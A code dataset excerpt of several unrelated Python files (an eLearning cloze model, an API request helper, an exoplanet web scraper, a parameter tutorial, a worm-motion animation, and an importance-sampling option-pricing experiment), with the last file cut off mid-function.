    5. To check vocabulary knowledge.
    6. \n
    7. To check word formation and/or grammatical\n competence.
    \"\"\")\n emphasis = Idevice.SOMEEMPHASIS\n icon = \"icon_question.gif\"\n description = fields.RichTextField(blank=True, default=\"\",\n help_text=_(\"\"\"Provide instruction on how the cloze activity should be\ncompleted. Default text will be entered if there are no changes to this field.\n\"\"\"))\n cloze_text = fields.ClozeTextField(blank=True, default=\"\",\n help_text=_(\"\"\"Enter the text for the cloze activity in to the cloze field\nby either pasting text from another source or by typing text directly into the\nfield.To select words to hide, double click on the word to select it and\nclick on the underscore button in the toolbar.\"\"\"))\n feedback = fields.FeedbackField(blank=True, default=\"\",\n help_text=_(\"\"\"Enter any feedback you wish to provide the learner\n with-in the feedback field. This field can be left blank.\"\"\"))\n drag_n_drop = models.BooleanField(default=False)\n\n class Meta:\n app_label = \"exeapp\"\n\n","sub_path":"exeapp/models/idevices/clozeidevice.py","file_name":"clozeidevice.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354562911","text":"# -*- coding: utf-8 -*-\nimport json\nimport requests\nfrom back.encrpyt import interfaceDes\nfrom back.log import Log\n\nclass testApi:\n def __init__(self):\n self.header1 = {'Accept': '* / *',\n 'Accept - Encoding': 'gzip, deflate, br',\n 'Accept - Language': 'zh, en - US;q = 0.9, en;q = 0.8, zh - CN;q = 0.7',\n 'Connection': 'keep - alive',\n 'Content - Type': 'text/html;charset=utf-8'\n }\n self.header2 = {'content-type': 'application/x-www-form-urlencoded', 'Access-Control-Allow-Origin': '*'}\n\n def lRequest(self, url, service, method='post', data='', headers=''): # 接口请求\n if type(service) is str: service = {\"service\": service}\n if 'webapi' in url:\n if any(data) and any(headers) is False:\n headers = self.header1\n if 'test' in url:\n data = data\n else:\n print(data)\n print(type(data))\n data = interfaceDes(data)\n else:\n if any(data) and any(headers) is False:\n headers = self.header2\n if 'test' in url:\n data = data\n else:\n data = interfaceDes(data, web_api=False)\n try:\n r = requests.request(method, url, data=data, headers=headers, params=service)\n response_code = r.status_code\n response_text1 = json.loads(r.text) # 对返回的指定字段断言,字段名取自Excel的期望2\n Log().info(' 【成功发起POST请求】 请求结果code为:%s, 请求结果字段为:%s' % (response_code, json.loads(r.text)))\n return response_code, response_text1\n except Exception as e:\n Log().error('【post请求出错】 出错原因:%s' % e)\n return {'code': 1, 'result': 'post请求出错,出错原因:%s' % e}","sub_path":"back/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339483091","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport csv\r\nimport requests\r\nSTART_URL = \"https://exoplanets.nasa.gov/exoplanet-catalog/\"\r\nbrowser = webdriver.Chrome(\"chromedriver_win32\\chromedriver.exe\")\r\nbrowser.get(START_URL)\r\ntime.sleep(10)\r\n\r\nheaders = [\"Star\", \"Constellation\", \"Right ascensation\", \"App_mag\", \"Distance\",\"hyperlink\"]\r\nplanet_data=[]\r\ndef scrap():\r\n for i in range(1,430):\r\n while True :\r\n time.sleep(2)\r\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\r\n current_page_numb=int(soup.find_all(\"input\",attributes={\"class\",\"page_numb\"}).get(\"value\"))\r\n if current_page_numb < i :\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n elif current_page_numb>i:\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[1]/a').click()\r\n else:\r\n break\r\n\r\n for ul_tag in soup.find_all(\"ul\", attrs={\"class\", \"exoplanet\"}):\r\n li_tags = ul_tag.find_all(\"li\")\r\n temp_list = []\r\n for index, li_tag in enumerate(li_tags):\r\n if index == 0:\r\n temp_list.append(li_tag.find_all(\"a\")[0].contents[0])\r\n else:\r\n try:\r\n temp_list.append(li_tag.contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n hyerlink_li_tag=li_tags[0]\r\n temp_list.append(\"https://en.wikipedia.org/wiki/List_of_brown_dwarfs\"+hyperlink_li_tag.find_all(\"a\",href=True)[0][\"href\"])\r\n \r\n planet_data.append(temp_list)\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n print(f\"{i} page done1\")\r\ndef scrap_more_data(hyperlink):\r\n try:\r\n page=request.get(hyperlink)\r\n soup=BeautifulSoup(page.content,\"html.parser\")\r\n for tr_tag in soup.find_all (\"tr\",attrs={\"class\":\"fact_rope\"}):\r\n tr_tags=tr_tags.find_all(\"td\")\r\n temp_list=[]\r\n for td_tag in td_tags:\r\n try:\r\n temp_list.append(td_tag.find_all(\"div\",attrs={\"class\",\"value\",})[0].contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n new_planet_data.append(temp_list)\r\n except:\r\n time.sleep(1)\r\n scrap_more_data(hyerlink)\r\n\r\nscrap()\r\nfor data in planet_data:\r\n scrap_more_data(data[5])\r\n print(f\"{index+1} page done2\")\r\nfinal_planet_data=[]\r\n\r\nfor index,data in enumerate (planet_data):\r\n new_planet_data_element=new_planet_data_element[index]\r\n new_planet_data_element=[elem.replace(\"\\n\",\"\")for elem in new_planet_data_element]\r\n new_planet_data_element=new_planet_data_element[:7]\r\n final_planet_data.append(data+new_planet_data_element)\r\n\r\nwith open (\"final.csv\",\"w\") as f:\r\n csvwriter=csv.writer(headers)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerows(final_planet_data)","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566715022","text":"# def 函式名稱(參數名稱=預設資料):\n# 函式內部的程式碼\n#參數可給預設值 但必須放在一般參數之後\ndef say(msg=\"hello\"):\n print(msg)\nsay(\"hihi\")\nsay() #會印出預設資料 hello\n\n#名稱對應\n# def 函式名稱(名稱1, 名稱2):\n# 函式內部的程式碼\n# #呼叫函式 以參數名稱對應資料\n# 函式名稱(名稱2=3, 名稱1=5) 若不指定 要造順序給\ndef divide(n1, n2):\n result=n1/n2\n print(\"divide: \", result)\ndivide(2, 4)\ndivide(n2=2, n1=4)\n\n#無限參數\n# def 函式名稱(*無限參數) #參數名稱前面+ \"*\"等於無限參數\n# 無限參數以Tuple資料形態處理\n# 函式內部的程式碼\n# #呼叫函式,可傳入無線數量的參數\n# 函式名稱(資料1, 資料2, 資料3)\n\n#範例\n#函式接受無限參數msgs\ndef saylimit(*msgs):\n #以Tuple的方式處理\n for msgg in msgs:\n print(msgg)\nsaylimit(\"hi\", \"hihi\", \"hihihi\")\n\n\n\nprint(\"=====實際程式撰寫======\")\n#實際程式撰寫\n#參數的預設資料 和參數的名稱對應\ndef power(base, exp=0):\n print(base**exp)\npower(3,2)\npower(exp=3, base=2) #參數的名稱對應\npower(4) #預設為0 所以4的0次方為1\n\n#無限/不定量 參數資料\n#做總量平均數 但數字量不固定 avg(3,4) avg(3,5,10) avg(1,4,-1,-8)\nprint(\"做總量平均數 但數字量不固定 avg(3,4) avg(3,5,10) avg(1,4,-1,-8)\")\ndef avg(*num):\n sum = 0\n avgs = 0\n for i in num:\n sum = sum + i\n avgs = sum / len(num)\n print(avgs)\n\navg(3, 4)\navg(3, 5, 10)\navg(1 ,4, -1, -8)\n\n#另外寫法\n# def avg(*num):\n# sum = 0\n# for i in num:\n# sum = sum + i\n# print(sum / len(num))\n#\n# avg(3, 4)\n# avg(3, 5, 10)\n# avg(1 ,4, -1, -8)\n","sub_path":"learn/8_def_adv.py","file_name":"8_def_adv.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379585071","text":"# manducaGraph\n# This function animates a beautiful movie of one or more Manducas racing along.\n# It works from a file that has saved data from a prior simulation run.\n#\n# Inputs:\n#\tmode: -\t0 means display each file as a horizontally-moving worm;\n#\t\tone file (i.e., one worm) per line in the movie. In this\n#\t\tcase, 'arg' is how many seconds the full movie should last and\n#\t\t'varargin' is an alternating list of (the name of a file of\n#\t\tworm data, followed by a label for that worm).\n#\t - 1 means display one worm only, but display it as a sequence\n#\t\tof 'arg' stills, one over the other. In this case, 'varargin'\n#\t\tis the name of exactly one file of worm data.\n#\targ, varargin: as indicated above.\n# A common call might then be\n#\tmanducaGraph (0, 20, 'C:\\users\\johnM\\matlab\\graph1.txt', 'Slow worm',\n#\t\t\t 'C:\\users\\johnM\\matlab\\graph2.txt', 'Fast worm');\n# This would display both worms (one from graph1.txt and one from graph2.txt)\n# racing against each other. The two animated worms would be labeled\n# 'Slow worm' and Fast worm'.\n#\n# Another common call might be\n#\tmanducaGraph (1, 20, 'C:\\users\\johnM\\matlab\\graph1.txt')\n# This would take the worm-motion data from graph1.txt, pull out 20 stills at\n# evenly-spaced times, and display them.\n#\n# The worm-data files are typically produced by manducaFitness(), which can\n# be told to save all simulation data into a file.\n\n# Constants.\nFPS = 30\t\t# frames per second.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.patches as patches\n\ndef manducaGraph (mode, arg, *rest):\n global points\n # Build points[n_frames,15,n_worms]\n # The 2nd dimension is 15: t, 5 x values, 5 leg_locked and 4 muscle_on.\n # The 3rd dimension is always the number of worms to draw one above another.\n # The 1st dimension is the number of frames to time-sequence for each worm.\n if (mode==0):\t\t# video of one or more worms racing.\n # Read the file(s) and build points[n_frames][15 items][n_worms]\n wall_time = int(arg)\n n_frames = 1 + wall_time*FPS\n if (len(rest) & 1 != 0):\n raise Exception ('Missing label name for file')\n\n n_files = len(rest)//2\n labels = [rest[2*f+1] for f in range(n_files)]\n points = np.empty ((n_frames,15,n_files))\n for f in range(n_files):\n points[:,:,f] = read_file (rest[2*f], n_frames)\n elif (mode==1):\t\t# a few stills of one worm.\n # In this mode, we just read one file of data (from one worm).\n # Then we extract 'n_stills' evenly-spaced stills from it to\n # build points[1][15 items][n_stills].\n n_stills = arg\n points = np.empty ((1,15,n_stills))\n pts = read_file (rest[0], n_stills)\n # We now take our N frames, extracted from one worm over time, and\n # pretend that they are 1 frame each from N worms. That will result in\n # a sequence of N stills.\n for st in range(n_stills):\n points[:,:,st] = pts[st,:]\n labels = ['t='+str(100*st/(n_stills-1)) for st in range(n_stills)]\n else:\n raise Exception ('Illegal mode: must be 0 or 1')\n\n # We now have points[n_display_timepoints][15][n_worms]. Run the movie.\n display (points, labels)\n\n# Inputs:\n# -\tfile: a filename. The file has one line per simulation timepoint.\n#\tEach line is comma-separated values with the format\n#\ttime, x1,x2,x3,x4,x5, lock1...lock5, musc1...musc5\n# - n_frames: the number of frames to return. So if the file contains data\n#\tfrom t=0 to t=100 and we want to return 3 frames, then we will sample\n#\tevery 50s of simulated time.\n# Return a 2D array where row #i is the simulation data at frame #i.\n# So the first row is for t=0. The last row is for the simulation end time \n# which is always t=100).\n# The returned array has the same number of columns (with the same meaning) as\n# the simulation file.\ndef read_file (file, n_frames):\n print ('Sampling file', file, 'to create',n_frames,'frames.')\n\n # Read the file, starting at the 2nd line (the top line is a comment).\n # Now we have an array where each line is\n #\t(time, x1,x2,x3,x4,x5, lock1...lock5, musc1...musc5)\n with open (file, 'r') as fp:\n lines = fp.readlines() # one list item per line.\n # The top line is just a comment\n del lines[0]\n n_rows = len(lines)\n n_cols = len(lines[0].split(','))\n # Do a double-nested list comprehension to get the data.\n pts_list = [[float(val) for val in line.split(',')] for line in lines]\n raw = np.array (pts_list)\n\n # Sanity check that we have 15 columns.\n assert (raw.shape[1] == 15) # time, x1-5, 5 lock values, 4 muscles.\n # Sanity check that the leg-lock values are all 0 or 1.\n assert ((raw[:,6:11]==0) | (raw[:,6:11]==1)).all()\n # And the muscle values are all 0 or 100.\n assert ((raw[:,11:15]==0) | (raw[:,11:15]==100)).all()\n\n # How often must we sample to get n_frames frames?\n # Note the .00001; we want to ensure that the final value of desired_t below\n # is not actually *bigger* than raw[-1,0]; that would make us skip the last\n # point\n t_final = raw[-1,0] - .00001\n interval = t_final/(n_frames-1)\n\n # Now do the interpolation.\n # Note that the file may occasionally have such small timesteps that,\n # when we print out with finite precision, it seems like two consecutive\n # rows share the same time. The algorithm below is robust to that.\n\n # It should always be true that desired_t = interval * (points_row-1).\n desired_t = 0\t\t# The timepoint we want numbers for.\n points_row = 0\t\t# We will put this row in points(points_row,:).\n\n # The big picture: this loop keeps stepping through 'raw' until desired_t\n # is in [row r.time, row r+1.time]. Then it interpolates to find the data at\n # desired_t (and any other desired timepoints that are also in the interval)\n # The first time around the loop, desired_t=0 and the interval really is\n # closed on the left; afterwards, it is always (].\n # At the bottom of this loop, we will always have desired_t > raw[r+1].time,\n # since we will have kept incrementing desired_t until it is out of the\n # interval.\n points = np.empty((n_frames,15))\n for r in range(raw.shape[0]-1):\t# For every row pair (r,r+1)\n time1 = raw[r,0]\t\t# timepoint for this table row\n time2 = raw[r+1,0]\t\t# timepoint for the next table row\n while (desired_t <= time2):\n inter = interpolate(raw,r,desired_t)\n points[points_row,:] = interpolate(raw,r,desired_t)\n desired_t += interval\n points_row += 1\n return (points)\n\n# Given:\n#\t- raw: an array of (time, x1,x2,x3,x4,x5,lock1...lock5) for all\n#\t timepoints that were integration timesteps.\n#\t- t: the timepoint we really want.\n#\t- r: says where to find t=next_interval in 'raw'.\n# Assume that the desired time 't' obeys raw(r,1)<= t <= raw(r+1,1).\n# Perform linear interpolation based on that time and return a full 15-element\n# row vector where:\n#\t- [0] is the desired time 't'\n#\t- [1:5] are the interpolated 'x' positions of the five body segments.\n#\t- [6:10] are the lock conditions from raw(r,6:10)\n#\t- [11:14] are the muscles from raw(r,11:14).\ndef interpolate (raw,r,t):\n ###print ('Interpolating row',r,'and',r+1,'for time=',t)\n assert ((raw[r,0]<=t) & (raw[r+1,0]>=t))\n frac = (t-raw[r,0])/(raw[r+1,0]-raw[r,0])\n # Interpolate the X values (1:5). Also interpolate time as a sanity check.\n points = np.empty((15))\n points[0:6] = raw[r,0:6] + frac*(raw[r+1,0:6]-raw[r,0:6])\n assert (abs (points[0]-t) < .0001)\n\n # The leg-lock values just get dragged along.\n points[6:15] = raw[r,6:15]\t\t# Leg-lock values & muscles.\n\n # Very occasionally, the Matlab ODE solver will squish the worm so much that\n # a front leg gets pushed behind a back leg! Fix that here -- we really\n # should fix the ODEs instead :-(, but I've not gotten around to debugging\n # it.\n for i in range (2,6):\n points[i] = max (points[i-1],points[i])\n return (points)\n\n############################################################\n# The rest of the file is for window display\n############################################################\n\n# Set up the plot window.\n# We create axes, scaled so that:\n#\t* x ranges over the min/max x values from the simulation.\n#\t* y ranges from 0 to n_worms; i.e., each worm is allocated a vertical\n#\t space of 1.\ndef display (points, labels):\n n_worms = points.shape[2]\n print ('making',n_worms,'worms')\n\n # Get min & max value in 'points'. Make sure to only min/max over the X\n # values (i.e., columns 1:5), not the leg-locks & muscles.\n x_min = np.min(points[:,1:6,:])\n x_max = np.max(points[:,1:6,:])\n\n # Set up the figure and its axes.\n fig,axes = plt.subplots()\n axes.axis ([x_min,x_max,0,n_worms])\n axes.set_autoscale_on(False)\n # print ('x limits=', axes.get_xlim(), ', y limits=', axes.get_ylim())\n\n draw_labels (labels, axes)\t\t# Label each worm with text on the left\n init_pats(n_worms, axes)\t\t# Create all of the moving shapes\n\n msecPerFrame = 1000/FPS\n ani = animation.FuncAnimation(fig, per_frame, frames=points.shape[0],\n interval=msecPerFrame, blit=True,\n repeat=False)\n print (\"Finished animation\")\n plt.show()\n\n# Create all of the rectangles that make up the legs and body segments for all\n# of the worms. Just put them anywhere at all; per_frame() will move them.\n# Each worm has:\n# - 5 legs. A leg is a single vertical rectangle.\n# - 4 body segments. Each one is a horizontal rectangle (perhaps with a bit of\n# curvature), as well as a horizontal line in it if the segment's muscle is on\n# We keep all of these objects in\n# - Legs[5][n_worms]\n# - BodySegs[4][2][n_worms]. For this, [*][0][*] is the main-segment rectangle,\n# and [*][1][*] is the corresponding muscle-on band.\ndef init_pats(n_worms, axes):\n global legs, bodySegs, allPatches\n legs = np.empty ((5, n_worms), dtype=object)\n bodySegs = np.empty ((4, 2, n_worms), dtype=object)\n\n for w in range(n_worms):\n for l in range(5):\t# Build the red legs\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='r')\n axes.add_patch (pat)\n legs[l][w] = pat\n\n for bs in range(4):\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='g')\n axes.add_patch (pat)\t# Green body segments\n bodySegs[bs][0][w] = pat\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='k')\n axes.add_patch (pat)\t# Black muscle-on bands\n bodySegs[bs][1][w] = pat\n\n # Collect up all of the rectangles into one big list, so that per_frame()\n # can return the list.\n allPatches = [legs[l][w] for l in range(5) for w in range(n_worms)]\n bs = [bodySegs[bs][0][w] for bs in range(4) for w in range(n_worms)]\n m = [bodySegs[bs][1][w] for bs in range(4) for w in range(n_worms)]\n allPatches.extend (bs)\n allPatches.extend (m)\n\n# The per-frame animation function.\n# Inputs: 'points' is a full array with[n_timepoints][data][n_worms] (where\n#\tn_timepoints is the number of frames to be displayed).\n# Remember that our display axes are:\n#\t* x ranges over the min/max x values from the simulation.\n#\t* y ranges from 0 to n_worms; i.e., each worm is allocated a vertical\n#\t space of 1.\ndef per_frame (f):\n global legs, bodySegs, points, allPatches\n for y in range(legs.shape[1]):\t# For each worm (& draw worm #i at y=i)\n # Make a slice with just this frame & worm. It has [0:5]=legX,\n # [6:10]=legLocked, [10:14]=muscle\n pts = points[f,1:,y]\n leg_width=30\n for l in range(5):\n legX = pts[l]; lock=pts[l+5]\n # A leg is 'width' wide, centered at 'x'.\n # Its top is at y+.5; it drops down to y+(lock?.3:.4).\n x_l = legX-leg_width/2\n y_b = y + (.4 - lock/10)\n legs[l][y].set_bounds (x_l,y_b, leg_width, y+.5-y_b)\n\n for bs in range(4):\n x1 = pts[bs]; x2=pts[bs+1]; musc=pts[bs+10]\n # Draw the segment from x1+(leg_width/2) to x2-(leg_width/2).\n # However, it may be that x2-x1 <= leg_width, in which case the body\n # part would vanish -- in that case, we pretend that leg is skinnier\n if (x1 + leg_width >= x2):\n leg_width = (x2-x1)/4\n\n # The height goes from y=.7 to y=.5.\n # So the LL is (x1+(leg_width/2),.5).\n LL_x = x1+(leg_width/2)\n dx = x2-(leg_width/2) - LL_x\n bodySegs[bs][0][y].set_bounds (LL_x,.5+y, dx,.2)\n\n # If the muscle is on, draw a black band across the segment.\n bodySegs[bs][1][y].set_visible (musc==100)\n bodySegs[bs][1][y].set_bounds (LL_x,.58+y, dx,.04)\n\n # We must return a list of everything that's moving this frame. Just assume\n # that everything moves (which it mostly does), and thus return the same\n # list of all rectangles all the time.\n return allPatches\n\n# Draw the names of the worm(s), on the left side of the screen.\ndef draw_labels (labels, axes):\n L = len(labels)\n for i,label in enumerate(labels):\n y = (i+.5)\n axes.text (.05,y,label)\n\n# Actually run the program.\n# manducaGraph (0, 30, 'crawl6_final_output.txt', 'worm@20')","sub_path":"5_ManducaModel/manducaGraph.py","file_name":"manducaGraph.py","file_ext":"py","file_size_in_byte":13418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384535754","text":"import math\nimport numpy as np\nfrom scipy import special, integrate, optimize\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm as gauss\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom numpy import sqrt, pi, exp, log\nfrom scipy.linalg import norm\n\n# import mpmath as mp\n# from mpmath import sqrt, exp, log, pi, norm\n\nfrom blackscholes import *\n\n# Robbins-Monro (RM) iterations\nM = 500\n# Monte Carlo (MC) iterations\nN = 500000\n\ns0 = 100\nT = 1\nr = 0.05\nsigma = 0.2\n# strike price\nK = 1.4*s0\n# s0 = 1\n# T = 1\n# r = 0\n# sigma = 1\n\nBS = BlackScholes(s0, r, sigma, T)\n\n\ndef F(x):\n e = exp(x) - K\n if e > 0:\n return 50 * e\n else:\n return 0\n\ndef H(theta, x):\n xi = (sqrt(10) - 2) / 3 * theta\n if x < log(K) - xi:\n return 0\n # a = (theta - xi - x) * exp(-(x+xi)**2 + 0.5*(x+xi-theta)**2 + 0.5*x**2 - 0.25*(x-xi)**2 - 100*norm(theta))\n # return F(x+xi)**2*a\n a = (theta - xi - x) * exp(-1/4*x**2 - (2/3 + sqrt(10)/6)*x*theta + 2*x + (2*sqrt(10)/3 - 4/3)*theta)\n return a\n\ndef Hexpl(theta, x):\n return F(x)**2 * (theta - x) * exp(-0.75*x**2 + 0.5*(x-theta)**2 - 0.5*theta**2 - norm(theta))\n\ndef RM(theta, x):\n if x < log(K):\n return 0\n # a1 = (theta - x)*exp(-0.5*x**2 + 0.5*(x-theta)**2 - (3/2+1)*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 + 0.5*(x-theta)**2)\n # print(a1)\n if a1 == 0:\n print('NULL!!')\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a)) - K*a))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a)) - K*a))**2\n\ndef RMput(theta, x):\n # if x > log(K):\n # return 0\n # a1 = (theta - x)*exp(-x**2 + 0.5*(x-theta)**2 - 0.5*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 - theta*x - 100*norm(theta))\n if a1 == 0:\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a))))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a))))**2\n\ndef RMminus(theta, x):\n if x < log(K) + theta:\n return 0\n return (50*(exp(x - theta) - K))**2 * (2*theta - x) * exp(-2*norm(theta))\n # print(a1)\n # if a1 == 0:\n # print('NULL!!')\n # return 0\n # elif a1 < 0:\n # a = sqrt(-a1)\n # return -(50*(exp(x + log(a)) - K*a))**2\n # else:\n # a = sqrt(a1)\n # return (50*(exp(x + log(a)) - K*a))**2\n\ndef RMArouna(theta, x):\n if x < log(K):\n return 0\n # return (50*(exp(x)-K))**2 * (theta - x) * exp(-theta*x + 0.5*norm(theta)**2)\n return (50*(exp(x)-K))**2 * (theta - x) * exp(-theta*x)\n\ndef RMArounaplus(theta, x):\n if x < log(K) - theta:\n return 0\n return (50*(exp(x+theta)-K))**2 * -x * exp(-2*theta*x - norm(theta)**2)\n\n\ndef RMp(theta, x):\n if x < log(K):\n return 0\n # a1 = (theta - x)*exp(-x**2 + 0.5*(x-theta)**2 - 0.5*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 - theta*x - norm(theta))\n if a1 == 0:\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a)) - K*a))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a)) - K*a))**2\n\ndef esscher():\n theta = 0\n for n in range(M):\n pass\n\ndef rhoCall(theta):\n return exp(-2*sigma*sqrt(T)*abs(theta))\n\ndef FCall(x, K):\n e = s0*exp(sigma*sqrt(T)*x + (r-0.5*sigma**2)*T) - K\n if e > 0:\n return exp(-r*T) * e\n else:\n return 0\n\ndef rhoPut(theta):\n return 1\n\ndef FPut(x):\n e = K - s0*exp(sigma*sqrt(T)*x + (r-0.5*sigma**2)*T)\n if e > 0:\n return exp(-r*T) * e\n else:\n return 0\n\ndef adaptiv(rho, F):\n C1 = 1\n C2 = 10 * s0**2\n theta = 0\n for n in range(1, M+1):\n X = np.random.normal()\n theta = theta - C1/(C2 + n) * rho(theta) * F(X-theta)**2 * (2*theta-X)\n\n thetaM = theta\n print('thetaM = ', thetaM)\n\n mu = 0\n gSqSum = 0\n gs = np.zeros(N)\n mus = np.zeros(N)\n for n in range(1, N+1):\n X = np.random.normal()\n g = F(X+theta)*exp(-theta*X - 0.5 * theta**2)\n gSqSum = gSqSum - 1/n * (gSqSum - g**2)\n mu = mu - 1/n * (mu - g)\n theta = theta - C1/(C2 + M + n) * rho(theta) * F(X-theta)**2 * (2*theta-X)\n gSqSum = gSqSum - 1/n * (gSqSum - g**2)\n varest = gSqSum - mu**2\n\n if n % 100000 == 0 or n == N:\n print('theta = ', theta, 'mu = ', mu, 'varest = ', varest)\n\n return thetaM, theta, mu, varest\n\ndef crude(F):\n mu = 0\n gSqSum = 0\n for n in range(1, N+1):\n X = np.random.normal()\n g = F(X)\n mu = mu - 1/n * (mu - g)\n gSqSum = gSqSum - 1/n * (gSqSum - g**2)\n varest = gSqSum - mu**2\n if n % 100000 == 0 or n == N:\n print('mu = ', mu, 'varest = ', varest)\n\n\n\n\n# importance sampling by mean translation\ndef translation():\n # optimize theta by RM\n # theta = log(K)\n # theta = 6.22\n # theta = 0.82\n theta = 0\n for n in range(M):\n X = np.random.normal()\n thetaold = theta\n\n # theta -= 1 / 30000 / (n+1) * RM(theta, X)\n theta -= 1 / (n+1) * RMArouna(theta, X)\n # theta -= 1 / 0.121 / (n+1) * H2(theta, X)\n # theta -= 1 / 4500 / (n+1) * RMminus(theta, X)\n if norm(theta) > sqrt(n):\n print('le le le le Chen!!', theta)\n if n % 2:\n theta = 0.5\n else:\n theta = -0.5\n\n\n if theta != thetaold:\n print(str(thetaold) + ' -> ' + str(theta))\n if n % 1000 == 0:\n print(n, theta)\n input()\n # run MC with optimized theta\n res = np.zeros(N)\n for n in range(N):\n X = np.random.normal()\n res[n] = F(X + theta) * exp(-theta*X - 0.5*theta**2)\n if n % 1000 == 0:\n print(n, np.mean(res[:n+1]), np.var(res[:n+1]))\n\ndiscCall = 0\ndiscPut = 0\ndef call(x):\n global discCall\n e = s0 * exp(-0.5*sigma**2 * T + sigma * x)\n if e > Kprime:\n return e - Kprime\n else:\n discCall += 1\n return 0\n\ndef put(x):\n global discPut\n e = s0 * exp(-0.5*sigma**2 * T + sigma * x)\n if e < Kprime:\n return Kprime - e\n else:\n discPut += 1\n return 0\n\ndef MC():\n resCall = np.zeros(N)\n resPut = np.zeros(N)\n for n in range(N):\n X = np.random.normal(0, sqrt(T))\n resCall[n] = call(X)\n resPut[n] = put(X)\n if n % 1000 == 0:\n mput = np.mean(resPut[:n+1])\n print(n, np.mean(resCall[:n+1]), np.var(resCall[:n+1]), mput, np.var(resPut[:n+1]), s0 - Kprime + mput, discCall, discPut)\n print(exactCall(), exactCallVar(), exactPut(), exactPutVar())\n\ndef plotCallPutPrices():\n plt.figure()\n plt.title('Prices of call and put for different strikes')\n Ks = np.linspace(0.5, 1.5)\n call = [BS.exactCallPrice(K) for K in Ks]\n put = [BS.exactPutPrice(K) for K in Ks]\n plt.plot(Ks, call, label='call')\n plt.plot(Ks, put, label='put')\n plt.xlabel('strike')\n plt.ylabel('price')\n plt.legend()\n\ndef plotCallPutVar():\n plt.figure()\n plt.title('Exact variance of call and put for different strikes')\n Ks = np.linspace(0.5, 1.5)\n callvar = [BS.exactCallVar(K) for K in Ks]\n putvar = [BS.exactPutVar(K) for K in Ks]\n plt.plot(Ks, callvar, 'b', label='call')\n plt.plot(Ks, putvar, 'g', label='put')\n # call2 = [BS.callSquared(K) for K in Ks]\n # put2 = [BS.putSquared(K) for K in Ks]\n # plt.plot(Ks, call2, 'r', label='call2')\n # plt.plot(Ks, put2, 'k', label='put2')\n plt.xlabel('strike')\n plt.ylabel('variance')\n plt.legend()\n\ndef plotISVar():\n plt.figure()\n plt.title('Variance optimization problem (call)')\n for K in [0.6, 0.8, 1.0, 1.2, 1.4]:\n theta = np.linspace(-0.3, 1.6)\n var = [BS.exactCallVar(K, theta) for theta in theta]\n minth = theta[np.argmin(var)]\n line, = plt.plot(theta, var, label=str(K))\n plt.axvline(minth, color=line.get_color())\n\n plt.xlabel(r'$\\theta$')\n plt.ylabel('call variance')\n plt.legend(title='strike', loc='upper left')\n plt.autoscale(tight=True)\n\n plt.figure()\n plt.title('Variance optimization problem (put)')\n for K in [0.6, 0.8, 1.0, 1.2, 1.4]:\n theta = np.linspace(-1.6, 0.0)\n var = [BS.exactPutVar(K, theta) for theta in theta]\n minth = theta[np.argmin(var)]\n line, = plt.plot(theta, var, label=str(K))\n plt.axvline(minth, color=line.get_color())\n\n plt.xlabel(r'$\\theta$')\n plt.ylabel('put variance')\n plt.legend(title='strike', loc='upper left')\n plt.autoscale(tight=True)\n\ndef plotOptimalTheta():\n plt.figure()\n plt.title(r'Optimal $\\theta$ for different strikes')\n Ks = np.linspace(0.5, 1.5)\n optth = [optimize.brentq(lambda th: BS.callSquaredDeriv(s0*K, th), -5, 5) for K in Ks]\n plt.xlabel(r'$K/s_0$')\n plt.ylabel(r'$\\theta_{opt}$')\n plt.plot(Ks, optth)\n\ndef plot3DISVars():\n @np.vectorize\n def getVar(K, theta):\n return BS.exactCallVar(K, theta)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n K = np.linspace(0.6, 1.4)\n theta = np.linspace(0.3, 1.8)\n # K = np.linspace(0.0, 1.4)\n # theta = np.linspace(-3, 3)\n Km, thetam = np.meshgrid(K, theta)\n z = getVar(Km, thetam)\n minth = []\n minvar = []\n for i in range(len(K)):\n minvar.append(np.min(z[:,i]))\n minth.append(theta[np.argmin(z[:,i])])\n ax.plot(K, minth, minvar, 'r')\n ax.plot_surface(Km, thetam, z, cmap=plt.cm.jet, rstride=1, cstride=1, vmax=0.5)\n ax.set_xlabel('strike')\n ax.set_ylabel(r'$\\theta$')\n\ndef plotVarRM():\n plt.figure()\n plt.title('Call second moment and derivative')\n theta = np.linspace(0.4, 1.0)\n var = [BS.callSquared(K, theta) for theta in theta]\n deriv = 